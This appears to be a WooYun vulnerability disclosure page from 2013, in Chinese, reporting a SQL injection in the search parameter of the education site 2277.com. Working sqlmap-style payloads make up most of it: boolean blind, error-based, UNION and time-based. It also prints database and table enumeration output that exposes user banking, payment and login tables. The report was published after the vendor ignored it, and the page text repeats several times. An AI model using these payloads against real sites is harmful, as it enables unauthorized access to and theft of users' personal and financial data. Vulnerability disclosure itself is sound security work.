2277.com主站SQL注入漏洞 | wooyun-2013-032324| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032324

漏洞标题：2277.com主站SQL注入漏洞

漏洞作者： c2c2

提交时间：2013-07-25 23:33

修复时间：2013-09-08 23:34

公开时间：2013-09-08 23:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-25：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-09-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

www.2277.com 主站SQL注入漏洞，整站数据泄露

详细说明：

注入点：

http://www.2277.com/index.php?r=search/course&k=123

注入参数：k
---
Place: GET
Parameter: k
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=search/course&k=123' AND 8835=8835#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=search/course&k=123' AND (SELECT 5293 FROM(SELECT COUNT(*),CONCAT
(0x7168746571,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END)),0x716e797171,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QONP'
='QONP
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: r=search/course&k=-1912' UNION ALL SELECT CONCAT(0x7168746571,0x595
87a694d7a48595554,0x716e797171),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: r=search/course&k=123' AND SLEEP(5) AND 'wMJu'='wMJu
---

漏洞证明：

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
available databases [9]:
[*] 2277_bbs
[*] bbs_v2
[*] bill
[*] edu_db
[*] f2f
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

Database: f2f
[124 tables]
+------------------------------------+
| tb_check_list                      |
| tb_comments                        |
| tb_common_sequence                 |
| tb_course                          |
| tb_course_category                 |
| tb_course_category_course          |
| tb_course_lesson_evaluate          |
| tb_course_lesson_pay               |
| tb_course_lesson_present           |
| tb_course_lesson_screenshot        |
| tb_course_period                   |
| tb_course_schedule                 |
| tb_courseware                      |
| tb_courseware_download             |
| tb_courseware_reference            |
| tb_deploy_classroom                |
| tb_deploy_course_service           |
| tb_deploy_course_status            |
| tb_deploy_host                     |
| tb_deploy_host_ip                  |
| tb_deploy_online_log               |
| tb_deploy_service                  |
| tb_deploy_service_type             |
| tb_deploy_telecom                  |
| tb_group_buy                       |
| tb_group_buy_order                 |
| tb_order                           |
| tb_order_course                    |
| tb_order_course_evaluate           |
| tb_pay_channel                     |
| tb_pay_currency                    |
| tb_pay_income_log                  |
| tb_pay_recharge                    |
| tb_pay_withdrawl                   |
| tb_permission_item                 |
| tb_permission_role                 |
| tb_permission_role_permission      |
| tb_permission_user_role            |
| tb_refund_order                    |
| tb_refund_process                  |
| tb_refund_reason                   |
| tb_school                          |
| tb_school_category                 |
| tb_school_category_course          |
| tb_school_category_school          |
| tb_school_contract                 |
| tb_school_course_category          |
| tb_school_evaluate                 |
| tb_school_member                   |
| tb_school_member_permission        |
| tb_school_permission_info          |
| tb_school_permission_item          |
| tb_school_permission_item_category |
| tb_setting_bank                    |
| tb_setting_city                    |
| tb_setting_country                 |
| tb_setting_province                |
| tb_user_bank                       |
| tb_user_blacklist                  |
| tb_user_edu                        |
| tb_user_email_verify               |
| tb_user_evaluate                   |
| tb_user_favorite                   |
| tb_user_favorite_category          |
| tb_user_finger_email               |
| tb_user_finger_mobilephone         |
| tb_user_finger_username            |
| tb_user_info                       |
| tb_user_loginlog                   |
| tb_user_register                   |
| tb_user_secure_question            |
| tb_user_visit                      |
| tb_web_active_vote                 |
| tb_web_activity                    |
| tb_web_activity_application        |
| tb_web_article                     |
| tb_web_article_activity            |
| tb_web_article_type                |
| tb_web_auth_module                 |
| tb_web_auth_module_operate         |
| tb_web_auth_operate                |
| tb_web_auth_role                   |
| tb_web_banner                      |
| tb_web_banner_datasource           |
| tb_web_banner_log                  |
| tb_web_category                    |
| tb_web_category_info               |
| tb_web_elite_type                  |
| tb_web_exinfo                      |
| tb_web_index_module                |
| tb_web_index_module_type           |
| tb_web_keyword                     |
| tb_web_log                         |
| tb_web_message                     |
| tb_web_message_receiver            |
| tb_web_newbanner                   |
| tb_web_newbanner_type              |
| tb_web_params                      |
| tb_web_real_identification         |
| tb_web_student_taste               |
| tb_web_tuan_course                 |
| tb_web_video_course                |
| tb_web_video_course_active         |
| tb_web_violation                   |
| v_analyse_evaluate_condition       |
| v_deploy_classroom                 |
| v_deploy_classroom_all             |
| v_deploy_service_host_ip           |
| v_deploy_service_ip                |
| v_evaluate_course                  |
| v_evaluate_learner                 |
| v_evaluate_period                  |
| v_evaluate_school                  |
| v_evaluate_teacher                 |
| v_good_evaluate_course             |
| v_good_evaluate_learner            |
| v_good_evaluate_period             |
| v_good_evaluate_school             |
| v_good_evaluate_teacher            |
| v_learners_course                  |
| v_learners_course_period           |
| v_learners_lesson                  |
| v_learners_lesson_time             |
| v_query_pendpay_info               |
+------------------------------------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032324

漏洞标题：2277.com主站SQL注入漏洞

相关厂商：面对面互动教育网

漏洞作者： c2c2

提交时间：2013-07-25 23:33

修复时间：2013-09-08 23:34

公开时间：2013-09-08 23:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 c2c2@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-032324

漏洞标题：2277.com主站SQL注入漏洞

相关厂商：面对面互动教育网

漏洞作者： c2c2

提交时间：2013-07-25 23:33

修复时间：2013-09-08 23:34

公开时间：2013-09-08 23:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-032324"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 c2c2@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：